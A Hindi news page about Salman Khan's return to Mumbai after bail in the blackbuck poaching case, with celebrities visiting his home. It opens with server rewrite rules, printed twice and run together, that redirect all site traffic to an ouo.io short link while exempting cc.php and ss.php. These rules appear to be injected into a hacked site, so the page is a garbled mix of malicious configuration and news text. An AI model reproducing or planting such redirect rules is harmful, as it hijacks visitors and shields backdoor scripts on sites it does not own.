
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 525
मुंबई। काला हिरण शिकार केस में जमानत मिलने के बाद सलमान खान कल रात जोधपुर जेल से रिहा होकर मुंबई पहुंचे। सलमान को देखने के लिए मुंबई की सड़कों पर सैकड़ों की संख्या में फैन्स मौजूद थे। उनके घर के बाहर भी फैंस की भीड़ देखने को मिली। सलमान ने भी अपने फैमिली के साथ घर की बालकनी में आकर हाथ हिलाते हुए फैन्स का आभार जताया। घर पहुंचते ही सलमान से सबसे पहले कैटरीना कैफ मिलने पहुंची। सलमान से मिलने उनके घर कैटरीना कैफ, अमृता अरोड़ा, शकील लड़क, शाकिब सलीम, डेजी शाह, रमेश तोरानी, मलाइका अरोड़ा, महेश मांजरेकर, जैकलीन फर्नाडिज, वरुण धवन, आयुश शर्मा, प्रभु देवा, सानिया मिर्जा, राजपाल यादव, बॉबी देओल सहित अन्य सेलेब्स। कल रात को घर पहुंचे के बाद सलमान ने गैलेक्सी अपार्टमेंट की बालकनी में आकर सलमान ने फैन्स का अभिवादन किया। इस मौके पर उनके साथ सलीम खान और सलमा खान भी थे। दोनों काफी खुश नजर आ रहे थे। सलमान ने बहन अर्पिता के बेटे आहिल को गोद में उठा रखा था। सलमा और सलीम खान ने भी सलमान के फैन्स का हाथ जोड़कर शुक्रिया किया।